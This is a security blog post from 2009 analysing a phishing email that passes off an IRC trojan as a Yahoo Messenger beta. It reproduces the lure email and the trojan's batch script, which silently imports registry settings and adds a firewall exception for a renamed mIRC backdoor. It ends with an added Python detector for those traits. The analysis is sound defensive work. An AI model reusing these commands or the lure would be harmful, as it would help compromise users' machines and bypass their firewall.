Blog for hpHosts, and whatever else I feel like writing about ....

Friday, 24 April 2009

Email Alert: IRC Trojan disguised as Yahoo Messenger Beta 9.4

I received the following e-mail a few minutes ago;

Yahoo! Messenger <>

Preview the new
Yahoo! Messenger for Vista™

The new messenger Vista 9.3 now works on Windows XP too. Download Now <>

Sign up for the Yahoo! Messenger for Vista Group for the latest news and updates! Join Now <>

We need your help to improve the product.
» Send feedback <>
See Yahoo! Messenger for Vista in action.
» Watch the video preview

Note: While testing this product, you can still use your current version of Yahoo! Messenger (8.1 or 9.0).

See what's in store...

* Skins
* Sidebar Gadget
* Tabs
* Contact Scaling

©2007 Microsoft Corporation. Windows Vista is either a registered trademark or trademark of Microsoft Corporation in the United States and/or other countries.

Copyright © 2008 Yahoo! Inc. <*> All rights reserved. Privacy Policy <*> - Terms of Service <*> - Copyright/IP Policy <> - Help <*>

The link it points to for the download;


.. leads to an IP in China. If we scan the file with VirusTotal, we see it's an IRC trojan.

Extracting the file shows what claims to be a .DLL named fp721ext.dll. This "DLL", however, is actually a folder, and it contains the files shown in the following screenshot;

As you can see, there are quite a few in there. mIRC itself, a legitimate IRC client, has been renamed mircrosoft.exe. The folder also contains a file called csc.cmd. Amongst other things, this adds an exception to the Windows Firewall so that mircrosoft.exe can connect to the attacker's IRC channel without warning you;

@echo off
REM Opens the supposed image file (the post notes anyssya.jpg is a valid JPG, yet the script still launches it)
@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg
REM Silently imports regis.reg into the registry (/s suppresses the confirmation prompt)
@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"
REM Adds a Windows Firewall exception for the renamed mIRC client so it can connect out without prompting the user
@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE
REM Launches the renamed mIRC (mircrosoft.exe) without waiting for it to exit
@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe
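
As an added example (not code from the post or from the malware), here is a small Python triage check that runs over the csc.cmd lines quoted above and flags the behaviours the post describes: a firewall exception added via netsh, a silent registry import, an image file launched as a program, a directory posing as a DLL, and an executable name imitating a well-known brand. The brand list and the similarity threshold are my own assumptions.

```python
import re
from difflib import SequenceMatcher

# Assumed list of names malware commonly imitates; the sample above uses "mircrosoft.exe".
BRAND_NAMES = ("microsoft", "windows", "yahoo", "messenger")

# The csc.cmd content quoted in the post, embedded here as the sample input.
CSC_CMD = r"""
@echo off
@START C:\WINDOWS\system32\Setup\fp721ext.dll\anyssya.jpg
@regedit /s "C:\WINDOWS\system32\Setup\fp721ext.dll\regis.reg"
@cmd /c netsh firewall add allowedprogram C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe MicrosoftODBLL ENABLE
@START /B C:\WINDOWS\system32\Setup\fp721ext.dll\mircrosoft.exe
"""

def lookalike(stem):
    """Return the brand a file name stem closely imitates, or None if it matches exactly or not at all."""
    s = stem.lower()
    if s in BRAND_NAMES:
        return None
    for brand in BRAND_NAMES:
        if SequenceMatcher(None, s, brand).ratio() >= 0.85:  # assumed threshold
            return brand
    return None

def analyze_batch(script):
    """Return a list of human-readable findings for suspicious lines in a batch script."""
    findings = []
    for raw in script.splitlines():
        line = raw.strip().lstrip("@").strip()
        low = line.lower()
        if not low or low.startswith(("echo", "rem")):
            continue
        # Every drive-letter path on the line (lower-cased for matching).
        for path in re.findall(r"[a-z]:\\[^\s\"]+", low):
            parts = path.split("\\")
            if any(part.endswith(".dll") for part in parts[:-1]):
                findings.append(f"directory named like a DLL in path: {path}")
            brand = lookalike(parts[-1].rsplit(".", 1)[0])
            if brand:
                findings.append(f"lookalike executable name {parts[-1]!r} imitates {brand!r}")
        if "netsh firewall add allowedprogram" in low:
            findings.append(f"firewall exception added: {line}")
        if re.search(r"\bregedit\s+/s\b", low):
            findings.append(f"silent registry import: {line}")
        if re.search(r"\bstart\b.*\.(jpg|jpeg|gif|png)\b", low):
            findings.append(f"image file launched as a program: {line}")
    return findings

if __name__ == "__main__":
    for finding in analyze_batch(CSC_CMD):
        print(finding)
```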


regis.reg contains the following;


anyssya.jpg actually is a JPG file, and its detection at VT is non-existent. However, since it's also loaded by the csc.cmd file, I'm betting it's a little more than it seems.

The infection, judging by the .ini files, seems to connect to (

I'll post further analysis once complete. In the meantime, the e-mail itself originated from (Velcom (ADSL) NET-VELCOM-DSL-1) and had the following properties;

From: Yahoo! Vista [ - Invalid IP was passed to me ]
Date: 25/04/2009 02:20:45
Subject: The New Messenger Vista For Xp !
